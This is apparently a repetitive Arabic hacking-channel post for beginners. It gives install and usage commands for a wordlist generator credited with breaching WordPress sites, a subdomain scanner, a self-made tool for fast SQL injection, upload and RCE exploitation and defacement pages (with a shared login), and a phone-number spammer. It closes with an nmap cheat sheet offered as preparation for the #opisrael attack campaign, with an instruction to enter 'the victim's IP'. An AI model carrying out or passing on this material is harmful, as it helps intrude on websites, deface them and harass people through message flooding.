على الموقع وسحب جميع جميع الكلمات الموجودة به ومن ثم توليد ملف يوجد به جميع الكلمات لا بل أيضاً تقوم بمعرفة الايميلات وأسماء المستخدمين على موقع الهدف بالإضافة إلى تحميل جميع الملفات مثل الأوفيس أو ملفات الـ PDF وقد اثبتت هذه الأداة قدرتها على جمع المعلومات وتم اختراق الكثير من المواقع مثل Wordpress
تثبيت ادة
Goblin word Generator
Installtion :
pkg update
pkg upgrade
pkg install git
pkg install python
pkg install python2
pkg install python3
git clone https://github.com/UndeadSec/GoblinWordGenerator
cd GoblinWordGenerator
chmod +x *
أو
chmod 777 *
python3 goblin.py
GitHub
GitHub - UndeadSec/GoblinWordGenerator: Python wordlist generator
Python wordlist generator . Contribute to UndeadSec/GoblinWordGenerator development by creating an account on GitHub.
7- اداه portwitness
تم تصميم PortWitness كأداة للكشف عن النطاقات النشطة والمجالات الفرعية لمواقع الويب التي تستخدم ميزة فحص المنافذ. يساعد اختبار الاختراق وصائدي الأخطاء في جمع وجمع المعلومات حول النطاقات الفرعية النشطة للمجال الذي يستهدفونه. يقوم PortWitness بتعداد النطاقات الفرعية باستخدام Sublist3r ويستخدم Nmap مع nslookup للبحث عن المواقع النشطة. أخيرًا ، يتم تخزين المجال أو النطاقات الفرعية النشطة في ملف إخراج باستخدام ملف الإخراج هذا ، يمكن للمستخدم بدء اختبار هذه المواقع مباشرة. تم دمج Sublist3r أيضًا مع هذه الوحدة. إنه فعال للغاية ودقيق عندما يتعلق الأمر بمعرفة النطاقات الفرعية النشطة باستخدام Nmap و nslookup. تساعد هذه الأداة أيضًا المستخدم في الحصول على عناوين IP لجميع النطاقات الفرعية والمخازن ، ثم في ملف نصي ، يمكن استخدام عناوين IP هذه لإجراء مزيد من المسح للهدف.
اوامر تثبيتها
git clone https://github.com/viperbluff/PortWitness.git
chmod +x portwitness.sh
bash portwitness.sh الرابط
#CS
تم تصميم PortWitness كأداة للكشف عن النطاقات النشطة والمجالات الفرعية لمواقع الويب التي تستخدم ميزة فحص المنافذ. يساعد اختبار الاختراق وصائدي الأخطاء في جمع وجمع المعلومات حول النطاقات الفرعية النشطة للمجال الذي يستهدفونه. يقوم PortWitness بتعداد النطاقات الفرعية باستخدام Sublist3r ويستخدم Nmap مع nslookup للبحث عن المواقع النشطة. أخيرًا ، يتم تخزين المجال أو النطاقات الفرعية النشطة في ملف إخراج باستخدام ملف الإخراج هذا ، يمكن للمستخدم بدء اختبار هذه المواقع مباشرة. تم دمج Sublist3r أيضًا مع هذه الوحدة. إنه فعال للغاية ودقيق عندما يتعلق الأمر بمعرفة النطاقات الفرعية النشطة باستخدام Nmap و nslookup. تساعد هذه الأداة أيضًا المستخدم في الحصول على عناوين IP لجميع النطاقات الفرعية والمخازن ، ثم في ملف نصي ، يمكن استخدام عناوين IP هذه لإجراء مزيد من المسح للهدف.
اوامر تثبيتها
git clone https://github.com/viperbluff/PortWitness.git
chmod +x portwitness.sh
bash portwitness.sh الرابط
#CS
GitHub
GitHub - viperbluff/PortWitness: Tool for checking Whether a domain or its multiple sub-domains are up and running.
Tool for checking Whether a domain or its multiple sub-domains are up and running. - viperbluff/PortWitness
اداتي الخاصة باختبار المواقع المصابة بثغرة sqli & upload & RCE من خلال انشاء سكربتات الاستغلال والحقن السريع للمواقع المصابة ب SQLI ايضا تتمكن من خلال الاداة بانشاء INDEX توثيق اختراق بشكل احترافي وجميل دون الحاجة لكتابة الاوامر
رابط الاداة :
git clone https://github.com/profionaldhim/f-injection
رابط شرح الاداة :
https://youtu.be/sfmwLRAottE
يوزر الاداة : profionaldhim
باسورد : Yemen-Hacker445
رابط الاداة :
git clone https://github.com/profionaldhim/f-injection
رابط شرح الاداة :
https://youtu.be/sfmwLRAottE
يوزر الاداة : profionaldhim
باسورد : Yemen-Hacker445
GitHub
GitHub - profionaldhim/f-injection: تقوم هذه الاداة بالحقن السريع للمواقع الالكترونية المصابة بثغرة sqlmap بسهولة جدا وهي تتناسب…
تقوم هذه الاداة بالحقن السريع للمواقع الالكترونية المصابة بثغرة sqlmap بسهولة جدا وهي تتناسب مع المبتدئيين - GitHub - profionaldhim/f-injection: تقوم هذه الاداة بالحقن السريع للمواقع الالكترونية ال...
#الدرس_الثالث
git clone http://github.com/p4kl0nc4t/Spammer-Grab
cd Spammer-Grab
chmod +x auto-install.sh spammer.py
./auto-install.sh
python2 spammer.py --delay 30 حط الرقم والمفتاح من غير
0 او +
مثلا
python2 spammer.py --delay 30 249xxxxxxxxxx
مفتاح السودان 249
بعد ماتثبها وخلاص وحابب تجيبها بسرعة
ls
cd Spammer-Grab
python2 spammer.py --delay 30 249xxxxxxxxxx
#CS
git clone http://github.com/p4kl0nc4t/Spammer-Grab
cd Spammer-Grab
chmod +x auto-install.sh spammer.py
./auto-install.sh
python2 spammer.py --delay 30 حط الرقم والمفتاح من غير
0 او +
مثلا
python2 spammer.py --delay 30 249xxxxxxxxxx
مفتاح السودان 249
بعد ماتثبها وخلاص وحابب تجيبها بسرعة
ls
cd Spammer-Grab
python2 spammer.py --delay 30 249xxxxxxxxxx
#CS
السلام عليكم
أتيت لكم بهذه الاوامر المهمة الخاصة بأداة nmap لاستهداف المواقع وغيرها في اطار شروحاتنا للمبتدئين من أجل عملية #opisrael يوم السابع من هذا الشهر :
1- اوامر ال Nmap لعمل Scan على الهدف
لعمل اسكان ل ip واحد فقط : nmap 192.168.1.1
لعمل اسكان لهوست : nmap www.testhostname.com
لعمل اسكان لمجموعة من الا بى : nmap 192.168.1.1-20
لعمل اسكان على سب نت معين : nmap 192.168.1.0/24
لعمل اسكان من ملف text : nmap -iL list-of-ips.txt
========================================
2 - عمل اسكان على البورتات
سكان بورت واحد فقط : nmap -p 22 192.168.1.1
سكان مجموعة من البورتات : nmap -p 1-100 192.168.1.1
سكان سريع ل 100 مشهورين : nmap -F 192.168.1.1
سكان على 65535 بورت : nmap -p- 192.168.1.1
========================================
3 - فحص نوع البورتات المستخدمة TCP / UDP
سكان عن طريق اتصال من نوع TCP : nmap -sT 192.168.1.1
سكان العادى TCP/Syn : nmap -sS 192.168.1.1
سكان على بورتات ال UDP : nmap -sU -p 123,161,162 192.168.1.1
========================================
4 - الخدمات وتحديد نظام التشغيل
لمعرفة نظام التشغيل والخدمات الشغالة : nmap -A 192.168.1.1
لمعرفة الخدمات الشغالة : nmap -sV 192.168.1.1
لعمل banner grabbing خفيف لكي لايحدث Noise وانت تقوم بالسكان : nmap -sV --version-intensity 0 192.168.1.1
========================================
5 - لاستخراج ملف بالمعلومات التي جمعتها بال Nmap
الامر العادى للحفظ : nmap -oN outputfile.txt 192.168.1.1
لحفظ الملف على شكل XML : nmap -oX outputfile.xml 192.168.1.1
لحفظة بجميع الفورمات الموجودة : nmap -oA outputfile 192.168.1.1
========================================
6 - لمعرفة وجود ثغرة Heartbleed SSL
nmap -sV -p 443 --script=ssl-heartbleed 192.168.1.0/24
========================================
7 - معرفة معلومات اكثر عن ال IP
nmap --script=asn-query,whois,ip-geolocation-maxmind 192.168.1.0/24
========================================
طبعاً اداة ال Nmap اداة قوية في مجال الشبكات او اختبار الاختراق
من يريد التعرف على الاداة اكثر هذه بعض الكتب المفيدة
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
++++
Nmap 6: Network exploration and security auditing Cookbook Paperback – November 23, 20
#حاجه مهمة طبعا ح تجيب نوع المتصفحات بالامر دا طبعا بعد تجيب الايبي
nmap -sV 127.0.0.1/24
تكتب الايبي حق الضحيه طبعا بين ال sV- و ال 24/
#CS
أتيت لكم بهذه الاوامر المهمة الخاصة بأداة nmap لاستهداف المواقع وغيرها في اطار شروحاتنا للمبتدئين من أجل عملية #opisrael يوم السابع من هذا الشهر :
1- اوامر ال Nmap لعمل Scan على الهدف
لعمل اسكان ل ip واحد فقط : nmap 192.168.1.1
لعمل اسكان لهوست : nmap www.testhostname.com
لعمل اسكان لمجموعة من الا بى : nmap 192.168.1.1-20
لعمل اسكان على سب نت معين : nmap 192.168.1.0/24
لعمل اسكان من ملف text : nmap -iL list-of-ips.txt
========================================
2 - عمل اسكان على البورتات
سكان بورت واحد فقط : nmap -p 22 192.168.1.1
سكان مجموعة من البورتات : nmap -p 1-100 192.168.1.1
سكان سريع ل 100 مشهورين : nmap -F 192.168.1.1
سكان على 65535 بورت : nmap -p- 192.168.1.1
========================================
3 - فحص نوع البورتات المستخدمة TCP / UDP
سكان عن طريق اتصال من نوع TCP : nmap -sT 192.168.1.1
سكان العادى TCP/Syn : nmap -sS 192.168.1.1
سكان على بورتات ال UDP : nmap -sU -p 123,161,162 192.168.1.1
========================================
4 - الخدمات وتحديد نظام التشغيل
لمعرفة نظام التشغيل والخدمات الشغالة : nmap -A 192.168.1.1
لمعرفة الخدمات الشغالة : nmap -sV 192.168.1.1
لعمل banner grabbing خفيف لكي لايحدث Noise وانت تقوم بالسكان : nmap -sV --version-intensity 0 192.168.1.1
========================================
5 - لاستخراج ملف بالمعلومات التي جمعتها بال Nmap
الامر العادى للحفظ : nmap -oN outputfile.txt 192.168.1.1
لحفظ الملف على شكل XML : nmap -oX outputfile.xml 192.168.1.1
لحفظة بجميع الفورمات الموجودة : nmap -oA outputfile 192.168.1.1
========================================
6 - لمعرفة وجود ثغرة Heartbleed SSL
nmap -sV -p 443 --script=ssl-heartbleed 192.168.1.0/24
========================================
7 - معرفة معلومات اكثر عن ال IP
nmap --script=asn-query,whois,ip-geolocation-maxmind 192.168.1.0/24
========================================
طبعاً اداة ال Nmap اداة قوية في مجال الشبكات او اختبار الاختراق
من يريد التعرف على الاداة اكثر هذه بعض الكتب المفيدة
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
++++
Nmap 6: Network exploration and security auditing Cookbook Paperback – November 23, 20
#حاجه مهمة طبعا ح تجيب نوع المتصفحات بالامر دا طبعا بعد تجيب الايبي
nmap -sV 127.0.0.1/24
تكتب الايبي حق الضحيه طبعا بين ال sV- و ال 24/
#CS